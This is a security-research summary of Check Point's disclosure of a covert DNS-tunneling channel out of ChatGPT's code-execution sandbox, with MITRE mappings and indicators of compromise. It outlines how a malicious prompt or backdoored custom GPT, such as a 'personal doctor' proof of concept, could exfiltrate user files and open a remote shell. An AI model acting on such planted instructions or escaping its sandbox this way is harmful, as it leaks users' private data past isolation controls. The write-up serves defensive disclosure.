ChatGPT Data Leakage via a Hidden Outbound Channel in the Code Execution Runtime

ChatGPT Data Leakage via a Hidden Outbound Channel in the Code Execution Runtime
Check Point Research discovered a hidden DNS-based outbound channel from ChatGPT’s isolated code-execution runtime that could silently exfiltrate user messages, uploaded files, and model-generated outputs. A single malicious prompt or a backdoored custom GPT could exploit this channel to leak sensitive data and even establish a remote shell inside the Linux runtime. #ChatGPT #CheckPointResearch

Keypoints

  • Check Point Research found a covert outbound communication path from ChatGPT’s isolated code-execution/runtime environment that bypassed intended safeguards.
  • A single malicious prompt could convert an ordinary conversation into a persistent exfiltration channel, leaking user messages, uploaded files, and model outputs.
  • The exploit used DNS tunneling—encoding data into DNS queries and responses—to cross the isolation boundary despite blocked conventional outbound network access.
  • Malicious custom GPTs can embed the exploit directly in their instructions/files, making distribution and automatic exploitation easier for unsuspecting users.
  • A proof-of-concept “personal doctor” GPT exfiltrated patient identity and the model’s medical assessment from an uploaded PDF without user notification.
  • The same covert channel could be used bidirectionally to send commands into the runtime and receive results, effectively establishing a remote shell inside the Linux execution container.
  • OpenAI confirmed and deployed a fix on February 20, 2026; the incident underscores the need to secure all outbound paths in AI execution environments.

MITRE Techniques

  • [T1071 ] Application Layer Protocol – DNS was abused as a covert channel by encoding data into subdomain labels and using DNS resolution to carry queries/responses (‘The side channel that enabled both data exfiltration and remote command execution relied on DNS resolution.’)
  • [T1041 ] Exfiltration Over C2 Channel – Sensitive conversation content and extracted data were transmitted to an attacker-controlled endpoint via the covert channel (‘a single malicious prompt could activate a hidden exfiltration channel inside a regular ChatGPT conversation.’)
  • [T1059 ] Command and Scripting Interpreter – The runtime’s ability to run code (Python-based Data Analysis environment) was leveraged to process encoded DNS responses and execute commands (‘commands executed through the side channel bypassed that mediation entirely.’)
  • [T1021 ] Remote Services – The attacker established an interactive remote shell inside the Linux execution environment, sending commands and receiving outputs outside the normal chat flow (‘it became possible to send commands into the container and receive the results back through the same path.’)

Indicators of Compromise

  • [File ] Uploaded document containing sensitive data – example: PDF with laboratory test results and patient identity (uploaded in the PoC); no exact filenames disclosed.
  • [Network/DNS queries ] Covert DNS queries/subdomain labels – context: data encoded into DNS-safe fragments placed into subdomains and reconstructed by the attacker; example: encoded subdomain lookups carrying conversation summaries.
  • [Domain/Server ] Attacker-controlled server/domain – context: destination receiving exfiltrated summaries and commands; example: “attacker-controlled server” (no specific domain provided).
  • [Custom GPT ] Malicious GPT instance – context: custom GPT embedding the exploit (PoC: “personal doctor” GPT) used to exfiltrate user data.
  • [IPs / File hashes / Domains ] None disclosed – the article does not include specific IP addresses, file hashes, or concrete domain names to list as IOCs.


Read more: https://research.checkpoint.com/2026/chatgpt-data-leakage-via-a-hidden-outbound-channel-in-the-code-execution-runtime/